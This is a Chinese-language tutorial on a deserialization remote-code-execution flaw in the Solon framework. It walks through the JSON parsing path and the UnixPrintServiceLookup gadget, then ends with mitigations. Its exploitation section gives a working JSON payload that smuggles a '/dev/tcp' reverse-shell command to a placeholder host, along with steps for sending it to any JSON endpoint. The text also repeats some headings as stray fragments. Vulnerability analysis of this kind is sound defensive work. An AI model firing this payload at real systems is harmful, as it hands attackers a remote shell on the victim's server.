Solon框架JSON解析漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>
本漏洞存在于国产Web框架Solon的2.5.11及以下版本中，涉及JSON解析过程中的不安全反序列化操作，可能导致远程代码执行(RCE)。该漏洞在Linux系统且JDK环境下可被利用。<\/p>

漏洞影响<\/h2>

受影响版本<\/strong>：Solon 2.5.11及以下版本<\/li>

环境要求<\/strong>：

Linux操作系统<\/li>
JDK环境（JRE环境不可利用）<\/li> <\/ul> <\/li>
触发条件<\/strong>：任何接收JSON参数的API端点<\/li> <\/ul>
环境搭建<\/h2>

使用官方示例项目：<\/p>
https:\/\/solon.noear.org\/start\/build.do?artifact=<\/span>helloworld_jdk8&project=<\/span>maven&javaVer=<\/span>1.8 <\/span><\/span><\/code><\/pre><\/li> 修改pom.xml<\/code>中的Solon版本为存在漏洞的版本：<\/p> <parent><\/span> <\/span><\/span> <groupId><\/span>org.noear<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>solon-parent<\/artifactId><\/span> <\/span><\/span> <version><\/span>2.5.11<\/version><\/span> <\/span> <\/span><\/span> <relativePath\/><\/span> <\/span><\/span><\/parent><\/span> <\/span><\/span><\/code><\/pre><\/li> 必须在Linux系统且JDK环境下启动应用<\/p> <\/li> <\/ol> 漏洞分析<\/h2> JSON处理流程<\/h3> 请求处理入口<\/strong>：<\/p> org.noear.solon.core.handle.ActionExecuteHandlerDefault#executeHandle<\/code><\/li> 调用mWrap.invokeByAspect(obj, args.toArray())<\/code>执行控制器方法<\/li> <\/ul> <\/li> 参数绑定<\/strong>：<\/p> buildArgs(ctx, obj, mWrap)<\/code>方法负责参数绑定<\/li> JSON数据会被解析为ONode<\/code>对象<\/li> <\/ul> <\/li> 类型处理<\/strong>：<\/p> 通过@type<\/code>指定要反序列化的类<\/li> org.noear.snack.to.ObjectToer#getTypeByNode<\/code>方法根据@type<\/code>加载类<\/li> <\/ul> <\/li> 对象实例化与赋值<\/strong>：<\/p> 使用ClassWrap.get(clz)<\/code>获取类包装<\/li> 扫描目标类的所有非静态字段<\/li> 通过反射或setter方法为字段赋值<\/li> <\/ul> <\/li> <\/ol> 与Fastjson的区别<\/h3> 赋值限制<\/strong>：<\/p> 仅当目标对象存在对应字段时才会赋值<\/li> 不会自动调用setter\/getter方法<\/li> 因此Fastjson的传统payload无法直接使用<\/li> <\/ul> <\/li> 可利用类<\/strong>：<\/p> sun.print.UnixPrintServiceLookup<\/code>类可利用<\/li> 实例化时会启动线程执行refreshServices()<\/code><\/li> Linux下会调用getDefaultPrinterNameBSD()<\/code>方法<\/li> 存在命令拼接和执行操作<\/li> <\/ul> <\/li> <\/ol> 漏洞利用<\/h2> POC构造<\/h3> { <\/span><\/span> "name"<\/span>: { <\/span><\/span> "@type"<\/span>: "sun.print.UnixPrintServiceLookup"<\/span>, <\/span><\/span> "lpcFirstCom"<\/span>: [ <\/span><\/span> ";sh -i >& \/dev\/tcp\/xxx.xxx.xxx.xxx\/xxxx 0>&1;"<\/span>, <\/span><\/span> ";sh -i >& \/dev\/tcp\/xxx.xxx.xxx.xxx\/xxxx 0>&1;"<\/span> <\/span><\/span> ] <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>利用步骤<\/h3> 构造上述JSON payload，替换其中的IP和端口<\/li> 向目标应用的任意接收JSON参数的API端点发送POST请求<\/li> 成功触发后，攻击者服务器将收到反弹shell<\/li> <\/ol> 实际案例：nginxWebUI漏洞<\/h2> 受影响版本<\/strong>：nginxWebUI v4.2.2<\/li> Solon版本<\/strong>：2.4.5（存在漏洞）<\/li> 利用限制<\/strong>：官方Docker镜像使用JRE环境，无法利用<\/li> 必须在JDK环境下启动才能成功利用<\/li> <\/ul> <\/li> <\/ol> 防御措施<\/h2> 升级Solon框架<\/strong>：升级到2.5.12及以上版本<\/li> 环境限制<\/strong>：生产环境使用JRE而非JDK<\/li> 考虑使用非Linux系统（如Windows）降低风险<\/li> <\/ul> <\/li> 输入验证<\/strong>：对接收的JSON数据进行严格验证<\/li> 安全配置<\/strong>：禁用不必要的类反序列化<\/li> <\/ol> 技术细节补充<\/h2> 关键类分析<\/h3> sun.print.UnixPrintServiceLookup<\/code>：<\/p> 位于JDK中，JRE环境不可用<\/li> 实例化时启动线程执行refreshServices()<\/code><\/li> lpcFirstCom<\/code>属性用于命令执行<\/li> <\/ul> <\/li> ClassWrap<\/code>：<\/p> 负责类元数据缓存和字段扫描<\/li> 通过反射获取类字段信息<\/li> <\/ul> <\/li> <\/ol> 漏洞限制<\/h3> 必须满足Linux+JDK环境组合<\/li> 目标类必须包含对应字段才能赋值<\/li> 无法利用传统的Fastjson gadget chain<\/li> <\/ol> 总结<\/h2> 该漏洞展示了Solon框架在JSON解析过程中的不安全反序列化问题，通过精心构造的payload可导致RCE。虽然利用条件较为严格（需Linux+JDK），但在符合条件的环境中危害严重。开发者应及时升级框架版本，并采取适当的安全措施防范此类漏洞。<\/p>

Solon框架JSON解析漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2> 本漏洞存在于国产Web框架Solon的2.5.11及以下版本中，涉及JSON解析过程中的不安全反序列化操作，可能导致远程代码执行(RCE)。该漏洞在Linux系统且JDK环境下可被利用。<\/p>

漏洞分析<\/h2>

漏洞利用<\/h2>

技术细节补充<\/h2>

漏洞概述<\/h2>
本漏洞存在于国产Web框架Solon的2.5.11及以下版本中，涉及JSON解析过程中的不安全反序列化操作，可能导致远程代码执行(RCE)。该漏洞在Linux系统且JDK环境下可被利用。<\/p>